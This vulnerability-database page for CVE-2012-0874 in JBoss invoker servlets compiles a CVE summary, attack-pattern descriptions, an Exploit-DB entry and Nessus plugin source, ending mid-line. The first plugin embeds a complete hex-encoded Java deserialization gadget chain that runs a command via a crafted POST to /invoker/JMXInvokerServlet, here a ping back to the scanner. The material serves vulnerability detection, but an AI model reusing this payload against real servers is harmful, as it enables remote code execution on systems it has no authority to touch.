Vulnerabilities > CVE-2012-0874 - Improper Authentication vulnerability in Redhat products
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a "second layer of authentication," or when used in conjunction with other vulnerabilities that bypass this second layer.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Authentication Abuse An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Utilizing REST's Trust in the System Resource to Register Man in the Middle This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to place man in the middle once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.
- Man in the Middle Attack This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components.
Exploit-Db
| description | EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE. Remote exploit for windows platform |
| file | exploits/windows/remote/30211.txt |
| id | EDB-ID:30211 |
| last seen | 2016-02-03 |
| modified | 2013-12-11 |
| platform | windows |
| port | |
| published | 2013-12-11 |
| reporter | rgod |
| source | https://www.exploit-db.com/download/30211/ |
| title | EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE |
| type | remote |
Nessus
NASL family Web Servers NASL id JBOSS_JAVA_SERIALIZE.NASL description The remote JBoss server is affected by multiple remote code execution vulnerabilities : - A flaw exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. A remote attacker can exploit this issue to bypass authentication and invoke MBean methods, allowing arbitrary code to be executed in the context of the user running the server. (CVE-2012-0874) - The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host. (CVE-2015-7501) last seen 2020-06-01 modified 2020-06-02 plugin id 87312 published 2015-12-10 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/87312 title JBoss Java Object Deserialization RCE code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(87312); script_version("1.16"); script_cvs_date("Date: 2019/11/22"); script_cve_id("CVE-2012-0874", "CVE-2015-7501"); script_bugtraq_id(57552, 78215); script_xref(name:"CERT", value:"576313"); script_xref(name:"EDB-ID", value:"30211"); script_name(english:"JBoss Java Object Deserialization RCE"); script_summary(english:"Attempts to execute a command on the remote host via a crafted RMI request."); script_set_attribute(attribute:"synopsis", value: "The remote JBoss server is affected by multiple remote code execution vulnerabilities."); script_set_attribute(attribute:"description", value: "The remote JBoss server is affected by multiple remote code execution vulnerabilities : - A flaw exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. A remote attacker can exploit this issue to bypass authentication and invoke MBean methods, allowing arbitrary code to be executed in the context of the user running the server. (CVE-2012-0874) - The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host. (CVE-2015-7501)"); # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db"); script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/solutions/2045023"); script_set_attribute(attribute:"solution", value: "Apply the appropriate interim fix according to the vendor advisory. Alternatively, ensure that all exposed ports used by the JBoss server are firewalled from any public networks."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-7501"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/10"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_a-mq"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_bpm_suite"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_data_virtualization"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_brms_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_portal_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_soa_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_web_server"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_fuse"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_fuse_service_works"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network"); script_set_attribute(attribute:"cpe", value:"x-cpe:/a:redhat:jboss_data_grid"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("string.inc"); include("http.inc"); port = get_http_port(default:8080, embedded:FALSE); # Check http banner for JBoss banner = get_http_banner(port: port); if ("JBoss" >!< banner && "Apache-Coyote" >!< banner) audit(AUDIT_NOT_LISTEN,"JBoss",port); # Open connection to JBoss. soc = open_sock_tcp(port); if (!soc) audit(AUDIT_SOCK_FAIL,"JBoss",port); # # setup unique id for pingback # id_tag = hexstr(rand_str(length:10)); # # build request # rn = raw_string(0x0d, 0x0a); raddress = get_host_ip(); laddress = compat::this_host(); cmd = "ping -c 10 -p " + string(id_tag) + " " + laddress; cmdlen = strlen(cmd); serObj = hex2raw(s:"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400"); serObj += raw_string(cmdlen) + cmd; serObj += hex2raw(s:"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A"); contentLen = strlen(serObj); postdata = "POST /invoker/JMXInvokerServlet HTTP/1.1" + rn + "Host: "+ raddress +":"+ string(port) + rn + "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" + rn + "Content-Length: " + string(contentLen) + rn + rn + serObj; # See if we get a response from RMI payload filter = "icmp and icmp[0] = 8 and src host " + raddress; s = send_capture(socket:soc, data:postdata, pcap_filter:filter); s = tolower(hexstr(get_icmp_element(icmp:s,element:"data"))); close(soc); # No response, meaning we didn't get in if(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,"JBoss",port); report = NULL; if (report_verbosity > 0) { report = '\n' + 'Nessus was able to exploit a Java deserialization vulnerability using' + '\n' + 'a crafted RMI request.' + '\n'; security_hole(port:port, extra:report); } else security_hole(port:port);NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0192.NASL description Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-06-01 modified 2020-06-02 plugin id 64079 published 2013-01-24 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/64079 title RHEL 5 : JBoss EAP (RHSA-2013:0192) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2013:0192. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(64079); script_version("1.28"); script_cvs_date("Date: 2019/10/24 15:35:36"); script_cve_id("CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"); script_bugtraq_id(51392, 53877, 54183, 54631, 54915, 55770, 56812); script_xref(name:"RHSA", value:"2013:0192"); script_name(english:"RHEL 5 : JBoss EAP (RHSA-2013:0192)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL. (CVE-2012-3546) The JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908) An XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575) SecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370) Configuring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478) twiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066) NonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034) The JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server. (CVE-2012-0874) The JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377) CallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369) Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat." ); # https://access.redhat.com/knowledge/docs/ script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/documentation/en-us/" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2013:0192" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-0034" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-2377" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2011-2908" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2011-1096" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-2379" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-3546" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2009-5066" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-5478" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2011-4575" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-3370" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2011-2487" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2011-2730" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-3369" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2012-0874" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:aopalliance"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:apache-cxf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:bsh2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:google-guice"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-search"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hornetq"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hornetq-native"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:javassist"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-aop2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cl"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-common-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-javaee"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-messaging"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-naming"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-reflect"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-remoting"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbosssx2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossts"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-framework"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-spi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jgroups"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-embedded"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin"); script_set_attribute(attribute:"cpe", 